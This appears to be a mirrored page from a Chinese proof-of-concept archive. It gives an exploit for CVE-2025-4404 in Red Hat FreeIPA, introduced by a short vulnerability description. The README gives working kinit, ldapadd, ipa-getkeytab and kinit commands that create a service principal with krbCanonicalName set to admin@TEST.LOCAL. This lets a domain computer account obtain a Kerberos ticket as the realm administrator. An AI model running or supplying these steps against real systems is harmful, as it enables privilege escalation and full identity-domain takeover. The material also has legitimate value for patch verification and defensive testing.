关联漏洞
标题:Red Hat FreeIPA 安全漏洞 (CVE-2025-4404)描述:Red Hat FreeIPA是美国红帽(Red Hat)公司的一套集成的安全信息管理解决方案。该产品主要为Linux和Unix计算机网络提供身份管理、策略管理和审计管理(IPA)等功能。 Red Hat FreeIPA存在安全漏洞,该漏洞源于未验证krbCanonicalName唯一性,可能导致攻击者获取REALM管理员凭据并执行管理任务。
描述
POC for CVE-2025-4404
介绍
# CVE-2025-4404 POC
POC for CVE-2025-4404
If you have a domain computer account (host/pc1.test.local@test.local), then you can add the service by default. And you can set krbPrincipalName and krbCanonicalName. By default, the krbCanonicalName attribute value is missing for the FreeIPA 4.12.4 administrator account. You can request a Kerberos ticket with the value krbPrincipalName, but the ticket will contain the value krbCanonicalName.
Let's go
1) First, we will request a ticket on behalf of the computer account:
`$ kinit host/pc1.test.local@TEST.LOCAL -k -t /etc/krb5.keytab`
2) Add to LDAP service account:
```
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/pc1.test.local@TEST.LOCAL,cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/pc1.test.local@TEST.LOCAL
krbPrincipalName: test/pc1.test.local@TEST.LOCAL
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: admin@TEST.LOCAL
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
```
3) Request keytab
```
$ ipa-getkeytab -p test/pc1.test.local@TEST.LOCAL -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
```
4) Request ticket
`$ kinit --no-request-pac -k -t ./test.keytab test/pc1.test.local@TEST.LOCAL`
PWN!!!
You can check ticket by:
`ldapwhoami -H ldap://dc1.test.local`
文件快照
[4.0K] /data/pocs/0890d3000cda49fc43ba21da0b6c5f709776b3ac
└── [1.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。